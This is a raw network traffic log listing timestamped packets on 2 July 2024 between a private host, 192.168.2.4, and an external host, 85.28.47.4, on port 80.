                                            Jul 2, 2024 08:26:27.694390059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694401026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694411993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694413900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.694422960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694433928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694437981 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.694446087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694457054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694461107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.694468021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694475889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.694478035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694489956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694494009 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.694502115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694513083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694519997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.694526911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694538116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.694549084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.694571972 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.728979111 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.733865976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.905921936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.905975103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.905977964 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.905987978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906024933 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906034946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906047106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906048059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906059980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906070948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906073093 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906089067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906107903 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906272888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906312943 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906342030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906353951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906366110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906603098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906698942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906711102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906721115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906732082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906742096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906743050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906754971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906765938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906769037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906776905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906789064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.906793118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906814098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.906826973 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.907269001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907279968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907291889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907310009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907310963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.907321930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907330036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.907334089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907345057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907355070 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.907356977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907372952 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.907397032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.907883883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907896042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907907963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907918930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907924891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.907937050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907943964 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.907948971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907960892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907964945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.907973051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907984972 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.907988071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.907999039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908010006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908011913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.908035994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.908051968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.908768892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908782005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908793926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908804893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908808947 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.908817053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908828974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908832073 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.908840895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908850908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908855915 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.908862114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908871889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908878088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.908885002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908895969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908902884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.908906937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.908937931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.908946991 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.909692049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909703970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909715891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909728050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909739017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909743071 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.909750938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909760952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909763098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.909771919 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909781933 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.909784079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909796000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909801006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909806967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909809113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.909812927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.909883022 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.910710096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910722017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910732985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910744905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910756111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910762072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.910768032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910779953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910792112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910793066 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.910804033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910815954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910826921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910828114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.910839081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910851002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910854101 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.910861015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.910862923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.910892010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.910912037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.911717892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911730051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911741018 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911751986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911761999 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.911762953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911775112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911783934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.911786079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911798000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911808968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911814928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.911819935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911829948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.911833048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911844969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911856890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.911859035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.911895037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.911920071 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.912636995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912648916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912658930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912671089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912676096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.912682056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912693024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912698984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.912703037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912714958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912724018 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.912725925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912736893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912744045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.912748098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912760019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912765980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.912771940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912776947 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.912782907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.912802935 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.912827015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.913508892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.913521051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.913532019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.913542986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.913549900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.913559914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.913573027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.913587093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.913621902 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.913654089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.995126963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995187044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995193958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995203972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995209932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995214939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995225906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995337963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.995369911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.995640039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995652914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995663881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995682955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.995687008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995701075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995708942 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.995712996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995724916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995735884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995738029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.995747089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995759010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995759964 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.995770931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995780945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995784998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.995794058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.995798111 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.995819092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.995846033 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.996273994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996285915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996299982 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996310949 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.996311903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996323109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996325016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.996334076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996345043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996347904 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.996376038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.996537924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996551991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996562958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996573925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.996576071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996587038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996598005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.996598959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.996622086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.996637106 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.997174978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997184992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997195005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997205973 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997215986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997219086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.997227907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997236013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.997237921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997251987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997262955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997263908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.997279882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997282028 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.997292042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997298002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997303963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.997308016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997319937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.997325897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.997344017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.997361898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998123884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998136997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998146057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998157978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998168945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998177052 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998179913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998191118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998195887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998203039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998214006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998225927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998229027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998238087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998245001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998262882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998285055 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998853922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998864889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998876095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998888016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998897076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998898983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998909950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998915911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998922110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998931885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998944044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998945951 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998955011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998963118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998965979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998977900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998979092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.998987913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.998997927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.999022961 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.999792099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999808073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999819040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999830961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999834061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.999844074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999855995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999865055 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.999866009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999877930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999888897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999893904 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.999900103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999911070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999912977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.999923944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999933958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999934912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.999941111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.999959946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.000505924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.000677109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.000689030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.000699043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.000715017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.000715971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.000726938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.000736952 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.000739098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.000749111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.000761032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.000768900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.000771999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.000780106 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.000804901 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.001671076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001682997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001693010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001707077 CEST806388085.28.47.4192.168.2.4
